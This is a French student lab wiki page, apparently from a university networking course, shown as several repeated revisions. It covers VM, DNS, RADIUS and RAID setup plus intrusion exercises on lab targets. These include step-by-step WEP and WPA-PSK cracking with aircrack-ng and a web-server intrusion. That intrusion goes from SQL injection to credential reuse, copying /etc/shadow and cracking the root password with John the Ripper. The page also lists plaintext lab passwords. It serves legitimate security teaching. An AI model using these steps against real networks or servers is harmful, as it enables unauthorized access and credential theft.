<br />
$ aircrack-ng psk*.cap<br />
<br />
On trouve : <br />
<br />
# BSSID ESSID Encryption<br />
1 44:AD:D9:5F:87:05 kracotte06 WPA (1 handshake)<br />
<br />
On peut alors lancer la commande de test des clefs :<br />
<br />
$ aircrack-ng -w dictionnaire.lst -b 44:AD:D9:5F:87:05 psk*.cap<br />
<br />
== Attaque de type "homme au milieu" par usurpation ARP ==<br />
<br />
== Intrusion sur un serveur d’application Web ==<br />
<br />
Sur honey.plil.info : <br />
<br />
1. injection SQL<br />
<br />
2. connexion en tant qu'admin<br />
<br />
3. telechargement du fichier "config-db.php" (On remarque que il existe une BDD phpmyadmin) et "database.php" (ce fichier semble lui ne pas nous apporter d'informations)<br />
<br />
4. honey.plil.info/phpmyadmin -> connexion avec les logins trouvés dans le fichier "config-db.php" (phpmyadmin et gencovid19). On trouve alors une table "pma_users" indiquant le nom de plusieurs utilisateurs (totor62, manuals, phpmyadmin et root).<br />
<br />
5. en essayant le mdp "gencovid19" avec ces identifiants sur phpmyadmin : on peut se connecter en tant que "root" sur la BDD et on trouve le mdp de rex dans la bdd "test" et table "users".<br />
<br />
6. connexion en ssh sur rex@honey.plil.info.<br />
<br />
7. comme indication : "le mot de passe de root possède la même particularité que le mot de passe administrateur habituel des machines de projets". Alors on va créer un fichier de mots de 4 lettre pour ensuite doubler ces mots (exemple : bobo => bobobobo) pour essayer de cracker le mot de passe par la force brute. On créée alors le dictionnaire avec l'utilitaire crunch comme pour obtenir les clefs WEP :<br />
<br />
$ crunch 4 4 abcdefghijklmnopqrstuvwxyz > dico.txt<br />
<br />
Et on double la taille des mots :<br />
<br />
$ sed -i 's/\(.*\)/\1\1/' dico.txt<br />
<br />
On copie ensuite les fichiers "/etc/passwd" et "/etc/shadow" de rex@honey.plil.info sur notre zabeth. <br />
<br />
$ scp rex@honey.plil.info:/etc/passwd .<br />
$ scp rex@honey.plil.info:/etc/shadow .<br />
<br />
On utilise alors l'utilitaire "shadow" pour obtenir un fichier contenant le mot de passe haché de root :<br />
<br />
$ unshadow passwd shadow | head -1 > honey<br />
<br />
Puis on utilise "John the Ripper" pour cracker le mot de passe :<br />
<br />
$ john -w:dico.txt honey<br />
<br />
Après quelques minutes, on peut afficher le mot de passe trouvé :<br />
<br />
$ john --show honey<br />
root:fortfort:0:0:root:/root:/bin/bash<br />
1 password hash cracked, 0 left<br />
<br />
On trouve le mot de passe de root@honey.plil.info qui est "fortfort".<br />
<br />
= Point d'accès Wi-Fi authentifié via FreeRADIUS =<br />
<br />
== Configuration du point d'accès ==<br />
<br />
=== Point d'accès ===<br />
<br />
Tout d'abord il faut configurer l'authentification EAP dans la configuration :<br />
<br />
conf t<br />
<br />
aaa new-model<br />
aaa authentication login eap_rose group radius_rose<br />
radius-server host 193.48.57.181 auth-port 1812 acct-port 1813 key zinzin<br />
aaa group server radius radius_rose<br />
server 193.48.57.181 auth-port 1812 acct-port 1813<br />
exit<br />
<br />
Configurons le SSID :<br />
<br />
conf t<br />
<br />
dot11 ssid SSID_ROSE<br />
vlan 5<br />
authentication open eap eap_rose<br />
authentication network-eap eap_rose<br />
authentication key-management wpa<br />
mbssid guest-mode<br />
exit<br />
exit<br />
<br />
On associe notre SSID à l'interface WIFI :<br />
<br />
conf t<br />
<br />
interface Dot11Radio0<br />
encryption vlan 5 mode ciphers aes-ccm tkip<br />
ssid SSID_ROSE<br />
mbssid<br />
exit<br />
exit<br />
<br />
On paramètre notre VLAN (5)<br />
<br />
conf t<br />
<br />
interface Dot11Radio0.5<br />
encapsulation dot1Q 5<br />
no ip route-cache<br />
bridge-group 5<br />
bridge-group 5 subscriber-loop-control<br />
bridge-group 5 spanning-disabled<br />
bridge-group 5 block-unknown-source<br />
exit<br />
exit<br />
<br />
On configure l'interface filaire<br />
<br />
conf t<br />
<br />
interface GigabitEthernet0.5<br />
encapsulation dot1Q 5<br />
bridge-group 5<br />
exit<br />
exit<br />
<br />
Enfin, on configure l'IP de l'AP et sa gateway<br />
<br />
conf t<br />
<br />
ip default-gateway 10.1.0.1<br />
interface BVI 1<br />
ip address 10.1.0.3 255.255.255.0<br />
exit<br />
exit<br />
<br />
=== Routeur ===<br />
<br />
Commençons par configurer le VLAN 1 <br />
<br />
conf t<br />
<br />
interface vlan 1<br />
ip address 10.1.0.1 255.255.255.0<br />
exit<br />
exit<br />
<br />
Puis on configure le port (ici Gi1/0/3<br />
<br />
conf t<br />
<br />
interface Gi1/0/3<br />
switchport<br />
switchport mode trunk<br />
switchport trunk allowed vlan add 1<br />
exit<br />
exit<br />
<br />
Et voilà mon grand<br />
<br />
== Serveur FreeRADIUS ==<br />
<br />
Installation de freeRADIUS<br />
<br />
apt install freeradius<br />
<br />
On commence par configurer <code>/etc/freeradius/3.0/clients.conf</code> à détailler<br />
<br />
client zozo {<br />
ipaddr = 10.1.0.3/24<br />
secret = zinzin<br />
}<br />
<br />
ensuite <code>/etc/freeradius/3.0/eap.conf</code><br />
<br />
eap {<br />
[...]<br />
default_eap_type = peap<br />
}<br />
<br />
puis <code>/etc/freeradius/3.0/users</code><br />
<br />
[...]<br />
root Cleartext-Password := "glopglop"<br />
<br />
Pour vérifier que tout fonctionne bien, on peut lancer freeradius en mode debug <code>freeradius -X</code> (après avoir au préalable stoppé le processus)<br />
<br />
= Sécurisation des données (RAID 5) =<br />
<br />
Nous avons besoin de 3 LV à rajouter à notre VM :<br />
<br />
$ lvcreate -L1G -n Bellerose-raid1 storage<br />
$ lvcreate -L1G -n Bellerose-raid2 storage<br />
$ lvcreate -L1G -n Bellerose-raid3 storage<br />
<br />
Nous pouvons ainsi les rajouter à la configuration de notre VM (<code>/etc/xen/Bellerose.cfg</code>):<br />
<br />
'phy:/dev/storage/Bellerose-raid1,xvda5,w'<br />
'phy:/dev/storage/Bellerose-raid2,xvda6,w'<br />
'phy:/dev/storage/Bellerose-raid3,xvda7,w'<br />
<br />
Nous pouvons ensuite créer le RAID en relançant la VM et en se connectant dessus.<br />
<br />
$ apt install mdadm<br />
<br />
On va ensuite créer un disque nommé <code>/dev/md0</code> grâce à <code>mdadm</code> :<br />
<br />
$ mdadm --create /dev/md0 --level=5 --raid-devices=3 /dev/xvda5 /dev/xvda6 /dev/xvda7<br />
<br />
On peut ainsi vérifier que notre RAID 5 est effectif :<br />
<br />
$ lsblk<br />
NAME MAJ:MIN RM SIZE RO TYPE MOUNTPOINT<br />
xvda1 202:1 0 512M 0 disk [SWAP]<br />
xvda2 202:2 0 4G 0 disk /<br />
xvda3 202:3 0 10G 0 disk /home<br />
xvda4 202:4 0 10G 0 disk /var<br />
xvda5 202:5 0 1G 0 disk <br />
`-md0 9:0 0 2G 0 raid5 <br />
xvda6 202:6 0 1G 0 disk <br />
`-md0 9:0 0 2G 0 raid5 <br />
xvda7 202:7 0 1G 0 disk <br />
`-md0 9:0 0 2G 0 raid5 <br />
<br />
Enfin il faut monter ce disque fraîchement créé :<br />
<br />
$ mkfs.ext4 /dev/md0<br />
$ mkdir /media/raid<br />
<br />
on ajoute cette ligne dans <code>/etc/fstab</code> :<br />
<br />
/dev/md0 /media/raid ext4 defaults 0 1<br />
<br />
puis<br />
<br />
$ mount -a<br />
<br />
et toc<br />
<br />
= Chiffrement des données =<br />
<br />
a</div>Bjacquothttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G6&diff=57730TP sysres IMA5 2021/2022 G62022-01-10T16:27:39Z<p>Bjacquot : /* Services Internet */</p>
<hr />
<div>__TOC__<br />
<br style="clear: both;"/><br />
<br />
=Création de la machine virtuelle=<br />
<br />
On veut créer notre machine virtuelle sur l'hyperviseur (HV) capbreton. Afin de pouvoir télécharger l'image Debian, on utilise tout d'abord la commande suivante :<br />
<br />
$ export http_proxy=http://proxy.plil.fr:3128<br />
<br />
Pour lancer la création de la machine virtuelle, on doit donner le nom de la machine qui sera Bellerose (d'après le thème des noms de bière). Ensuite nous avons l'adresse IP qui nous a été attribuée lors de la répartition des groupes (donc pour nous ce sera 193.48.57.181). On donne aussi l'adresse IP du routeur flottant (193.48.57.190) et le masque du réseau (255.255.255.240 car c'est un /28). On indique également l'emplacement des disques virtuels : /usr/local/xen, le mot de passe pour se connecter à la machine virtuelle : pasglop, et la distribution que nous allons utiliser qui est Debian bullseye.<br />
<br />
$ xen-create-image --hostname=Bellerose --ip=193.48.57.181 --gateway=193.48.57.190 --netmask=255.255.255.240 --dir=/usr/local/xen --password=pasglop --dist=bullseye<br />
<br />
On crée ensuite 2 LV de 10 Go (nommés Bellerose1 et Bellerose2) sur le groupe de volume storage.<br />
<br />
$ lvcreate -L10G -n Bellerose1 storage<br />
$ lvcreate -L10G -n Bellerose2 storage<br />
<br />
Puis il faut les formater au format ext4, alors on utilise les commandes suivantes :<br />
<br />
$ mkfs.ext4 /dev/storage/Bellerose1<br />
$ mkfs.ext4 /dev/storage/Bellerose2<br />
<br />
On modifie notre fichier /etc/xen/Bellerose.cfg pour indiquer à la machine virtuelle qu'elle possède les volumes logiques Bellerose1 et Bellerose2 (on ajoute alors 2 lignes dans la fonction disk) et on ajoute le bridge IMA5sc dans la fonction vif.<br />
<br />
$ vim /etc/xen/Bellerose.cfg<br />
disk = [<br />
'file:/usr/local/xen/domains/Bellerose/disk.img,xvda2,w',<br />
'file:/usr/local/xen/domains/Bellerose/swap.img,xvda1,w',<br />
'phy:/dev/storage/Bellerose1,xvda3,w',<br />
'phy:/dev/storage/Bellerose2,xvda4,w'<br />
]<br />
vif = [ 'ip=193.48.57.181 ,mac=00:16:3E:FA:D0:95 ,bridge=IMA5sc' ]<br />
<br />
On peut maintenant lancer notre machine virtuelle :<br />
<br />
$ xl create -c /etc/xen/Bellerose.cfg<br />
<br />
Avec la commande :<br />
<br />
$ cat /etc/fstab<br />
<br />
On voit xvda1 et xvda2. On va créer xvda3 et xvda4 pour pouvoir y mettre les répertoires var et home de notre machine virtuelle :<br />
<br />
$ mkdir /mnt/xvda3<br />
$ mkdir /mnt/xvda4<br />
$ mount /dev/xvda3 /mnt/xvda3<br />
$ mount /dev/xvda4 /mnt/xvda4<br />
<br />
Puis on déplace le répertoire var dans le disque xvda4 :<br />
<br />
$ mv /var/* /mnt/xvda4<br />
<br />
Pour monter les disques, on ajoute ces lignes dans le fichier /etc/fstab :<br />
<br />
# /home vers xvda3<br />
/dev/xvda3 /home ext4 defaults 0 2<br />
# /var vers xvda4<br />
/dev/xvda4 /var ext4 defaults 0 2<br />
<br />
On monte le tout à l'aide de la commande :<br />
<br />
mount -a<br />
<br />
Enfin avec lsblk, on peut voir les deux partitions de notre VM :<br />
<br />
$ lsblk<br />
xvda3 202:3 0 10G 0 disk /home<br />
xvda4 202:4 0 10G 0 disk /var<br />
<br />
Enfin, nous activons l'IPv6 sur l'interface en modifiant <code>/etc/network/interfaces</code><br />
<br />
iface eth0 inet6 auto<br />
<br />
Pour quitter la VM : CTRL+]<br />
<br />
= Services Internet =<br />
<br />
== Serveur SSh ==<br />
<br />
$ apt install openssh-server<br />
<br />
on édite le fichierde conf <code>/etc/ssh/sshd_config</code> (via ssh key) :<br />
<br />
PermitRootLogin without-password<br />
PubkeyAuthentication yes<br />
<br />
après on reload la conf<br />
<br />
$ systemctl reload ssh<br />
<br />
On génère une clé ssh avec <code>ssh-keygen -t ed25519</code> et on l'ajoute dans <code>/.ssh/authorized_keys</code> et c'est gooooood<br />
<br />
== Serveur DNS ==<br />
<br />
on achète le ndd<br />
<br />
on crée un "Glue Record" pour notre nameserver <code>ns1.belle-rose.site</code><br />
<br />
on install bind<br />
<br />
$ apt install bind9<br />
<br />
on configure <code>/etc/resolv.conf</code><br />
<br />
nameserver 127.0.0.1<br />
<br />
on configure bind <code>/etc/bind/named.conf.local</code><br />
<br />
zone "belle-rose.site" IN {<br />
type master;<br />
file "/etc/bind/db.belle-rose.site";<br />
allow-transfer { 217.70.177.40; };<br />
};<br />
<br />
On ajoute nos ns <code>/etc/bind/db.belle-rose.site</code><br />
<br />
;<br />
; BIND dans ta face<br />
;<br />
$TTL 604800<br />
@ IN SOA ns1.belle-rose.site. postmaster.belle-rose.site. (<br />
2 ; Serial<br />
604800 ; Refresh<br />
86400 ; Retry<br />
2419200 ; Expire<br />
604800 ) ; Negative Cache TTL<br />
;<br />
@ IN NS ns1.belle-rose.site.<br />
@ IN NS ns6.gandi.net.<br />
ns1 IN A 193.48.57.181<br />
<br />
Ensuite on peut tester notre conf avec<br />
<br />
$ host -t any ns1.belle-rose.site localhost<br />
Using domain server:<br />
Name: localhost<br />
Address: 127.0.0.1#53<br />
Aliases: <br />
<br />
ns1.belle-rose.site has address 193.48.57.181<br />
<br />
== Certificat ==<br />
<br />
Notre certificat Gandi nous a été retiré de force par quelqu'un de mal intentionné. De ce fait, nous avons utilisé un certificat <code>Let's Encrypt</code>. Après avoir installé <code>certbot</code>, on utilise simplement la commande :<br />
<br />
certbot --apache<br />
<br />
https://www.belle-rose.site/ IZOK<br />
<br />
== DNSSEC ==<br />
<br />
= Tests d'intrusion =<br />
<br />
== Exploitation de failles du système ==<br />
<br />
Après plusieurs recherches, nous avons trouvé un petit soft permettant d'audit notre système et y afficher les possibles failles. > https://github.com/mzet-/linux-exploit-suggester<br />
<br />
En suivant la documentation :<br />
<br />
$ wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh -O les.sh<br />
$ chmod +x les.sh && ./les.sh<br />
<br />
On obtient les failles suivantes (audit réalisé sur notre VM) :<br />
<br />
[+] [CVE-2021-27365] linux-iscsi<br />
...<br />
[+] [CVE-2021-22555] Netfilter heap out-of-bounds write<br />
...<br />
[+] [CVE-2019-13272] PTRACE_TRACEME<br />
...<br />
<br />
== Cassage de clef WEP d’un point d’accès WiFi ==<br />
<br />
On commence par rechercher le nom de notre interface. On utilise alors la commande (en root) :<br />
<br />
$ airmon-ng<br />
<br />
On trouve l'interface suivante :<br />
<br />
wlx40a5ef0127d0<br />
<br />
On essaie de démarrer l'interface sur le channel 3 :<br />
<br />
$ airmon-ng start wlx40a5ef0127d0 3<br />
<br />
Or on remarque que la réponse de la commande nous indique que l'interface a été renommé automatiquement "wlan0mon". On ré-utilise la commande précédente avec le nouveau nom d'interface :<br />
<br />
$ airmon-ng start wlan0mon 3<br />
<br />
On écoute ensuite tous les paquets dans l'air :<br />
<br />
$ airodump-ng wlan0mon<br />
<br />
A partir de là, on peut choisir un point d'accès à cracker en utilisant son BSSID (obtenu par la commande précédente). On choisit cracotte06.<br />
<br />
$ aireplay-ng -9 -e cracotte06 -a 04:DA:D2:9C:50:55 wlan0mon<br />
<br />
On peut récupérer les VI générés par le point d'accès en les stockant dans les fichiers output. On donne le channel 4 puisque le point d'accès est sur ce channel :<br />
<br />
$ airodump-ng -c 4 --bssid 04:DA:d2:9C:50:55 -w output wlan0mon<br />
<br />
On effectue de fausses authentifications avec la commande aireplay-ng dans un nouveau terminal :<br />
<br />
$ aireplay-ng -1 0 -e cracotte06 -a 04:DA:D2:9C:50:55 -h 40:A5:EF:01:0E:5F wlan0mon<br />
<br />
L'adresse MAC source donnée après le -h est obtenue lorsque l'on récupère les VI.<br />
<br />
Il faut maintenant laisser tourner la commande de récupération des VI assez longtemps pour obtenir assez de données (pour nous içi il a fallu attendre 40000 datas). On peut ensuite décrypter la clef WEP :<br />
<br />
$ aircrack-ng -b 04:DA:D2:9C:50:55 output*.cap<br />
<br />
On obtient alors :<br />
<br />
KEY FOUND ! [ 55:55:55:55:5A:BC:07:CB:A4:44:44:44:44 ]<br />
Decrypted correctly: 100%<br />
<br />
== Cassage de mot de passe WPA-PSK par force brute ==<br />
<br />
$ airmon-ng<br />
$ airmon-ng start wlan0mon 9<br />
$ airodump-ng wlan0mon<br />
<br />
On choisit le point d'accès kracotte06 à cracker. On récupère son BSSID avec la commande précédente et on utilise :<br />
<br />
$ airodump-ng -c 4 --bssid 44:AD:D9:5F:87:05 -w psk wlan0mon<br />
<br />
On crée le dictionnaire contenant toutes les clefs à tester avec la commande <code>crunch</code><br />
<br />
$ crunch 8 8 0123456789 -o dictionnaire.lst<br />
<br />
Pour savoir si un Handshake a été trouvé, on utilise la commande :<br />
<br />
$ aircrack-ng psk*.cap<br />
<br />
On trouve : <br />
<br />
# BSSID ESSID Encryption<br />
1 44:AD:D9:5F:87:05 kracotte06 WPA (1 handshake)<br />
<br />
On peut alors lancer la commande de test des clefs :<br />
<br />
$ aircrack-ng -w dictionnaire.lst -b 44:AD:D9:5F:87:05 psk*.cap<br />
<br />
== Attaque de type "homme au milieu" par usurpation ARP ==<br />
<br />
== Intrusion sur un serveur d’application Web ==<br />
<br />
Sur honey.plil.info : <br />
<br />
1. injection SQL<br />
<br />
2. connexion en tant qu'admin<br />
<br />
3. telechargement du fichier "config-db.php" (On remarque que il existe une BDD phpmyadmin) et "database.php" (ce fichier semble lui ne pas nous apporter d'informations)<br />
<br />
4. honey.plil.info/phpmyadmin -> connexion avec les logins trouvés dans le fichier "config-db.php" (phpmyadmin et gencovid19). On trouve alors une table "pma_users" indiquant le nom de plusieurs utilisateurs (totor62, manuals, phpmyadmin et root).<br />
<br />
5. en essayant le mdp "gencovid19" avec ces identifiants sur phpmyadmin : on peut se connecter en tant que "root" sur la BDD et on trouve le mdp de rex dans la bdd "test" et table "users".<br />
<br />
6. connexion en ssh sur rex@honey.plil.info.<br />
<br />
7. comme indication : "le mot de passe de root possède la même particularité que le mot de passe administrateur habituel des machines de projets". Alors on va créer un fichier de mots de 4 lettre pour ensuite doubler ces mots (exemple : bobo => bobobobo) pour essayer de cracker le mot de passe par la force brute. On créée alors le dictionnaire avec l'utilitaire crunch comme pour obtenir les clefs WEP :<br />
<br />
$ crunch 4 4 abcdefghijklmnopqrstuvwxyz > dico.txt<br />
<br />
Et on double la taille des mots :<br />
<br />
$ sed -i 's/\(.*\)/\1\1/' dico.txt<br />
<br />
On copie ensuite les fichiers "/etc/passwd" et "/etc/shadow" de rex@honey.plil.info sur notre zabeth. <br />
<br />
$ scp rex@honey.plil.info:/etc/passwd .<br />
$ scp rex@honey.plil.info:/etc/shadow .<br />
<br />
On utilise alors l'utilitaire "shadow" pour obtenir un fichier contenant le mot de passe haché de root :<br />
<br />
$ unshadow passwd shadow | head -1 > honey<br />
<br />
Puis on utilise "John the Ripper" pour cracker le mot de passe :<br />
<br />
$ john -w:dico.txt honey<br />
<br />
Après quelques minutes, on peut afficher le mot de passe trouvé :<br />
<br />
$ john --show honey<br />
root:fortfort:0:0:root:/root:/bin/bash<br />
1 password hash cracked, 0 left<br />
<br />
On trouve le mot de passe de root@honey.plil.info qui est "fortfort".<br />
<br />
= Point d'accès Wi-Fi authentifié via FreeRADIUS =<br />
<br />
== Configuration du point d'accès ==<br />
<br />
=== Point d'accès ===<br />
<br />
Tout d'abord il faut configurer l'authentification EAP dans la configuration :<br />
<br />
conf t<br />
<br />
aaa new-model<br />
aaa authentication login eap_rose group radius_rose<br />
radius-server host 193.48.57.181 auth-port 1812 acct-port 1813 key zinzin<br />
aaa group server radius radius_rose<br />
server 193.48.57.181 auth-port 1812 acct-port 1813<br />
exit<br />
<br />
Configurons le SSID :<br />
<br />
conf t<br />
<br />
dot11 ssid SSID_ROSE<br />
vlan 5<br />
authentication open eap eap_rose<br />
authentication network-eap eap_rose<br />
authentication key-management wpa<br />
mbssid guest-mode<br />
exit<br />
exit<br />
<br />
On associe notre SSID à l'interface WIFI :<br />
<br />
conf t<br />
<br />
interface Dot11Radio0<br />
encryption vlan 5 mode ciphers aes-ccm tkip<br />
ssid SSID_ROSE<br />
mbssid<br />
exit<br />
exit<br />
<br />
On paramètre notre VLAN (5)<br />
<br />
conf t<br />
<br />
interface Dot11Radio0.5<br />
encapsulation dot1Q 5<br />
no ip route-cache<br />
bridge-group 5<br />
bridge-group 5 subscriber-loop-control<br />
bridge-group 5 spanning-disabled<br />
bridge-group 5 block-unknown-source<br />
exit<br />
exit<br />
<br />
On configure l'interface filaire<br />
<br />
conf t<br />
<br />
interface GigabitEthernet0.5<br />
encapsulation dot1Q 5<br />
bridge-group 5<br />
exit<br />
exit<br />
<br />
Enfin, on configure l'IP de l'AP et sa gateway<br />
<br />
conf t<br />
<br />
ip default-gateway 10.1.0.1<br />
interface BVI 1<br />
ip address 10.1.0.3 255.255.255.0<br />
exit<br />
exit<br />
<br />
=== Routeur ===<br />
<br />
Commençons par configurer le VLAN 1 <br />
<br />
conf t<br />
<br />
interface vlan 1<br />
ip address 10.1.0.1 255.255.255.0<br />
exit<br />
exit<br />
<br />
Puis on configure le port (ici Gi1/0/3<br />
<br />
conf t<br />
<br />
interface Gi1/0/3<br />
switchport<br />
switchport mode trunk<br />
switchport trunk allowed vlan add 1<br />
exit<br />
exit<br />
<br />
Et voilà mon grand<br />
<br />
== Serveur FreeRADIUS ==<br />
<br />
Installation de freeRADIUS<br />
<br />
apt install freeradius<br />
<br />
On commence par configurer <code>/etc/freeradius/3.0/clients.conf</code> à détailler<br />
<br />
client zozo {<br />
ipaddr = 10.1.0.3/24<br />
secret = zinzin<br />
}<br />
<br />
ensuite <code>/etc/freeradius/3.0/eap.conf</code><br />
<br />
eap {<br />
[...]<br />
default_eap_type = peap<br />
}<br />
<br />
puis <code>/etc/freeradius/3.0/users</code><br />
<br />
[...]<br />
root Cleartext-Password := "glopglop"<br />
<br />
Pour vérifier que tout fonctionne bien, on peut lancer freeradius en mode debug <code>freeradius -X</code> (après avoir au préalable stoppé le processus)<br />
<br />
= Sécurisation des données (RAID 5) =<br />
<br />
Nous avons besoin de 3 LV à rajouter à notre VM :<br />
<br />
$ lvcreate -L1G -n Bellerose-raid1 storage<br />
$ lvcreate -L1G -n Bellerose-raid2 storage<br />
$ lvcreate -L1G -n Bellerose-raid3 storage<br />
<br />
Nous pouvons ainsi les rajouter à la configuration de notre VM (<code>/etc/xen/Bellerose.cfg</code>):<br />
<br />
'phy:/dev/storage/Bellerose-raid1,xvda5,w'<br />
'phy:/dev/storage/Bellerose-raid2,xvda6,w'<br />
'phy:/dev/storage/Bellerose-raid3,xvda7,w'<br />
<br />
Nous pouvons ensuite créer le RAID en relançant la VM et en se connectant dessus.<br />
<br />
$ apt install mdadm<br />
<br />
On va ensuite créer un disque nommé <code>/dev/md0</code> grâce à <code>mdadm</code> :<br />
<br />
$ mdadm --create /dev/md0 --level=5 --raid-devices=3 /dev/xvda5 /dev/xvda6 /dev/xvda7<br />
<br />
On peut ainsi vérifier que notre RAID 5 est effectif :<br />
<br />
$ lsblk<br />
NAME MAJ:MIN RM SIZE RO TYPE MOUNTPOINT<br />
xvda1 202:1 0 512M 0 disk [SWAP]<br />
xvda2 202:2 0 4G 0 disk /<br />
xvda3 202:3 0 10G 0 disk /home<br />
xvda4 202:4 0 10G 0 disk /var<br />
xvda5 202:5 0 1G 0 disk <br />
`-md0 9:0 0 2G 0 raid5 <br />
xvda6 202:6 0 1G 0 disk <br />
`-md0 9:0 0 2G 0 raid5 <br />
xvda7 202:7 0 1G 0 disk <br />
`-md0 9:0 0 2G 0 raid5 <br />
<br />
Enfin il faut monter ce disque fraîchement créé :<br />
<br />
$ mkfs.ext4 /dev/md0<br />
$ mkdir /media/raid<br />
<br />
on ajoute cette ligne dans <code>/etc/fstab</code> :<br />
<br />
/dev/md0 /media/raid ext4 defaults 0 1<br />
<br />
puis<br />
<br />
$ mount -a<br />
<br />
et toc<br />
<br />
= Chiffrement des données =<br />
<br />
a</div>Bjacquothttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G6&diff=57696TP sysres IMA5 2021/2022 G62022-01-10T15:58:52Z<p>Bjacquot : /* Certificat */</p>
<hr />
<div>__TOC__<br />
<br style="clear: both;"/><br />
<br />
=Création de la machine virtuelle=<br />
<br />
On veut créer notre machine virtuelle sur l'hyperviseur (HV) capbreton. Afin de pouvoir télécharger l'image Debian, on utilise tout d'abord la commande suivante :<br />
<br />
$ export http_proxy=http://proxy.plil.fr:3128<br />
<br />
Pour lancer la création de la machine virtuelle, on doit donner le nom de la machine qui sera Bellerose (d'après le thème des noms de bière). Ensuite nous avons l'adresse IP qui nous a été attribuée lors de la répartition des groupes (donc pour nous ce sera 193.48.57.181). On donne aussi l'adresse IP du routeur flottant (193.48.57.190) et le masque du réseau (255.255.255.240 car c'est un /28). On indique également l'emplacement des disques virtuels : /usr/local/xen, le mot de passe pour se connecter à la machine virtuelle : pasglop, et la distribution que nous allons utiliser qui est Debian bullseye.<br />
<br />
$ xen-create-image --hostname=Bellerose --ip=193.48.57.181 --gateway=193.48.57.190 --netmask=255.255.255.240 --dir=/usr/local/xen --password=pasglop --dist=bullseye<br />
<br />
On crée ensuite 2 LV de 10 Go (nommés Bellerose1 et Bellerose2) sur le groupe de volume storage.<br />
<br />
$ lvcreate -L10G -n Bellerose1 storage<br />
$ lvcreate -L10G -n Bellerose2 storage<br />
<br />
Puis il faut les formater au format ext4, alors on utilise les commandes suivantes :<br />
<br />
$ mkfs.ext4 /dev/storage/Bellerose1<br />
$ mkfs.ext4 /dev/storage/Bellerose2<br />
<br />
On modifie notre fichier /etc/xen/Bellerose.cfg pour indiquer à la machine virtuelle qu'elle possède les volumes logiques Bellerose1 et Bellerose2 (on ajoute alors 2 lignes dans la fonction disk) et on ajoute le bridge IMA5sc dans la fonction vif.<br />
<br />
$ vim /etc/xen/Bellerose.cfg<br />
disk = [<br />
'file:/usr/local/xen/domains/Bellerose/disk.img,xvda2,w',<br />
'file:/usr/local/xen/domains/Bellerose/swap.img,xvda1,w',<br />
'phy:/dev/storage/Bellerose1,xvda3,w',<br />
'phy:/dev/storage/Bellerose2,xvda4,w'<br />
]<br />
vif = [ 'ip=193.48.57.181 ,mac=00:16:3E:FA:D0:95 ,bridge=IMA5sc' ]<br />
<br />
On peut maintenant lancer notre machine virtuelle :<br />
<br />
$ xl create -c /etc/xen/Bellerose.cfg<br />
<br />
Avec la commande :<br />
<br />
$ cat /etc/fstab<br />
<br />
On voit xvda1 et xvda2. On va créer xvda3 et xvda4 pour pouvoir y mettre les répertoires var et home de notre machine virtuelle :<br />
<br />
$ mkdir /mnt/xvda3<br />
$ mkdir /mnt/xvda4<br />
$ mount /dev/xvda3 /mnt/xvda3<br />
$ mount /dev/xvda4 /mnt/xvda4<br />
<br />
Puis on déplace le répertoire var dans le disque xvda4 :<br />
<br />
$ mv /var/* /mnt/xvda4<br />
<br />
Pour monter les disques, on ajoute ces lignes dans le fichier /etc/fstab :<br />
<br />
# /home vers xvda3<br />
/dev/xvda3 /home ext4 defaults 0 2<br />
# /var vers xvda4<br />
/dev/xvda4 /var ext4 defaults 0 2<br />
<br />
On monte le tout à l'aide de la commande :<br />
<br />
mount -a<br />
<br />
Enfin avec lsblk, on peut voir les deux partitions de notre VM :<br />
<br />
$ lsblk<br />
xvda3 202:3 0 10G 0 disk /home<br />
xvda4 202:4 0 10G 0 disk /var<br />
<br />
Enfin, nous activons l'IPv6 sur l'interface en modifiant <code>/etc/network/interfaces</code><br />
<br />
iface eth0 inet6 auto<br />
<br />
Pour quitter la VM : CTRL+]<br />
<br />
= Services Internet =<br />
<br />
== Serveur SSh ==<br />
<br />
$ apt install openssh-server<br />
<br />
on édite le fichierde conf <code>/etc/ssh/sshd_config</code> (via ssh key) :<br />
<br />
PermitRootLogin without-password<br />
PubkeyAuthentication yes<br />
<br />
après on reload la conf<br />
<br />
$ systemctl reload ssh<br />
<br />
On génère une clé ssh avec <code>ssh-keygen -t ed25519</code> et on l'ajoute dans <code>/.ssh/authorized_keys</code> et c'est gooooood<br />
<br />
== Serveur DNS ==<br />
<br />
on achète le ndd<br />
<br />
on crée un "Glue Record" pour notre nameserver <code>ns1.belle-rose.site</code><br />
<br />
on install bind<br />
<br />
$ apt install bind9<br />
<br />
on configure <code>/etc/resolv.conf</code><br />
<br />
nameserver 127.0.0.1<br />
<br />
on configure bind <code>/etc/bind/named.conf.local</code><br />
<br />
zone "belle-rose.site" IN {<br />
type master;<br />
file "/etc/bind/db.belle-rose.site";<br />
allow-transfer { 217.70.177.40; };<br />
};<br />
<br />
On ajoute nos ns <code>/etc/bind/db.belle-rose.site</code><br />
<br />
;<br />
; BIND dans ta face<br />
;<br />
$TTL 604800<br />
@ IN SOA ns1.belle-rose.site. postmaster.belle-rose.site. (<br />
2 ; Serial<br />
604800 ; Refresh<br />
86400 ; Retry<br />
2419200 ; Expire<br />
604800 ) ; Negative Cache TTL<br />
;<br />
@ IN NS ns1.belle-rose.site.<br />
@ IN NS ns6.gandi.net.<br />
ns1 IN A 193.48.57.181<br />
<br />
Ensuite on peut tester notre conf avec<br />
<br />
$ host -t any ns1.belle-rose.site localhost<br />
Using domain server:<br />
Name: localhost<br />
Address: 127.0.0.1#53<br />
Aliases: <br />
<br />
ns1.belle-rose.site has address 193.48.57.181<br />
<br />
== Certificat ==<br />
<br />
Notre certificat Gandi nous a été retiré de force par quelqu'un de mal intentionné. De ce fait, nous avons utilisé un certificat <code>Let's Encrypt</code>. Après avoir installé <code>certbot</code>, on utilise simplement la commande :<br />
<br />
certbot --apache<br />
<br />
https://www.belle-rose.site/ IZOK<br />
<br />
= Tests d'intrusion =<br />
<br />
== Exploitation de failles du système ==<br />
<br />
Après plusieurs recherches, nous avons trouvé un petit soft permettant d'audit notre système et y afficher les possibles failles. > https://github.com/mzet-/linux-exploit-suggester<br />
<br />
En suivant la documentation :<br />
<br />
$ wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh -O les.sh<br />
$ chmod +x les.sh && ./les.sh<br />
<br />
On obtient les failles suivantes (audit réalisé sur notre VM) :<br />
<br />
[+] [CVE-2021-27365] linux-iscsi<br />
...<br />
